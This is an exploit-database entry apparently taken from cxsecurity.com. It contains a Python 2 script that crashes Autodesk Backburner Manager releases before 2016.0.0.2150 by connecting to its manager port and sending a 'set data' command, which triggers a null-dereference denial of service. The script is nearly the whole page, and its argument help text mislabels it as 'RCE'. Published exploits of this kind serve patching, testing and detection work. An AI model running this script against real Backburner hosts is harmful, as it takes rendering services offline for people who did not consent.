Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference DoS

2017.01.27
Credit: b0nd
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

import sys import datetime import socket import argparse import os import time remote_host = '' remote_port = '' def callExit(): print "\ntt[!] exiting at %s .....\n" % datetime.datetime.now() sys.exit(1) def mySocket(): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) except socket.error: print 'Failed to create socket' sys.exit() print "\nt[+] Socket Created" s.connect((remote_host, remote_port)) print "\nt[+] Socket Connected to %s on port %s" % (remote_host, remote_port) return s # 250 backburner 1.0 Ready. def receiveBanner(s): banner = s.recv(4096) print banner def receiveData(s): data = s.recv(4096) print data def setDataCommand(s): receiveData(s) # backburner> print "Set Data Command" time.sleep(1) command = "set data\r\n" try: s.sendall(command) except socket.error: print 'Send failed' sys.exit() print "BackBurner Manager should have crashed" receiveData(s) # 200 Help receiveData(s) # Available Commands:.....and all set of commands # backburner> def main(): if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': os.system('clear') parser = argparse.ArgumentParser(description = 'RCE Autodesk BackBurner') parser.add_argument('--host', nargs='?', dest='host', required=True, help='remote IP of Autodesk host') parser.add_argument('--port', nargs='?', dest='port', default=3234, help='remote Port running manager.exe') args = parser.parse_args() if args.host == None: print "t[!] IP of remote host?" sys.exit() global remote_host global remote_port remote_host = args.host remote_port = args.port print "remote_host: %s" % remote_host print "remote_port: %s" % remote_port s = mySocket() receiveBanner(s) setDataCommand(s) print 'exit' sys.exit() if __name__ == '__main__': try: sys.exit(main()) except KeyboardInterrupt: callExit()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top